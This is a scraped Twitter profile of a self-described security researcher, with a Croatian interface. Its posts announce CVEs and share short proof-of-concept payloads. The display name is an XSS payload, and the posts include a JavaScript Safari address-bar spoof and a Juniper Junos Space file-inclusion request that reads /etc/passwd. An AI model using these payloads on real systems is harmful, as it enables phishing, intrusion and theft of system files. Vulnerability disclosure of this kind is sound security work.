ᐸsvg/onload=alert(  )ᐳ

@BufferBandit

Self taught security researcher.

0x41414141
Vrijeme pridruživanja: listopad 2013.

Tweetovi

Blokirali ste korisnika/cu @BufferBandit

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @BufferBandit

  1. Prikvačeni tweet

    Hey guys. Still working on my blog. Here a sneek peak of what will happen when you want to see it source, thx to :)

    Poništi
  2. prije 3 sata

    Got a new CVE 😃 Title: phpList Authentication Bypass CVE ID: CVE-2020-8547 Vulnerability Type: PHP type Juggling / Loose Comparison

    Poništi
  3. prije 1 sat

    New ☎️, who dis? Rotary dial brought back from the dead using an ESP32 and SIM800 GSM module:

    Poništi
  4. prije 3 sata
    Odgovor korisniku/ci

    zullen we dan meteen ook even die rare incels van aanpakken die menen dat t 'nee' van vrouwen eigenlijk geen 'nee' is? mooi.

    Poništi
  5. prije 7 sati
    Poništi
  6. 3. velj

    CVE-2019-8449 Exploit for Jira Releases Below v8.3.4. The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability.

    Poništi
  7. Poništi
  8. 11. pro 2019.

    I’m back ! For the past 5 years I have been secretly working on my second album and a brand new live show. I’m super excited to share it with you soon. See you in 2020 !

    Poništi
  9. 3. velj
    Poništi
  10. 3. velj
    Poništi
  11. 3. velj
    Odgovor korisniku/ci

    Dit is gewoon Britse achterwijk cultuur die over is komen waaien. Steekpartijen komen vergeleken met daar zelden voor. Alsof minder migratie er opeens voor zou zorgen dat deze jongens naar school gaan.

    Poništi
  12. 3. velj

    WinPwnage - UAC bypass, Elevate, Persistence and Execution methods

    Poništi
  13. 1. velj

    For anyone wondering, yes it’s written in C# and yes I will be totally adding it as a SILENTTRINITY module if I can get the source code (a few changes need to be made in order for it to run in memory).

    Prikaži ovu nit
    Poništi
  14. I take no pleasure in reporting this

    Prikaži ovu nit
    Poništi
  15. Poništi
  16. 2. velj

    Made really good progress on the CircuitPython "ExpoVert" badge during the stream today! Looking forward to displaying my social battery.

    Prikaži ovu nit
    Poništi
  17. 1. velj

    Attention CTF players (and organizers, CTFd v2.0.0 - v2.2.2 has a serious vulnerability (CVE-2020-7245) in which an attacker could perform account takeover using a leading-trailing on the Registration form. It has been fixed in v2.2.3. Make sure to update!

    Prikaži ovu nit
    Poništi
  18. 24. sij

    Hackers have been abusing a poor integrity check in BattlEye to completely circumvent game protection mechanisms. This has allowed cheat communities to intercept and modify every single piece information sent by the anti cheat to the respective servers.

    Prikaži ovu nit
    Poništi
  19. 30. sij

    [PoC] Safari Address Bar Spoof (CVE-2020-3833) var x = window .open('',''); setInterval(function(){x.location.replace('hxxps://www.google.com:8080');}); x. document. write(atob(evilPage));

    Ovo je potencijalno osjetljiv multimedijski sadržaj. Saznajte više
    Poništi
  20. 30. sij

    [PoC] Juniper Junos Space Local File Inclusion (CVE-2020-1611) - GET Param: (1) Set "Format" to "txt" (2) Set "FileUrl" to a local path - /ect/passwd GET /mainui/download?X-CSRF=Y581SFvK....53107455361&FileUrl=/etc/passwd&Format=txt&nod... HTTP/1.1

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·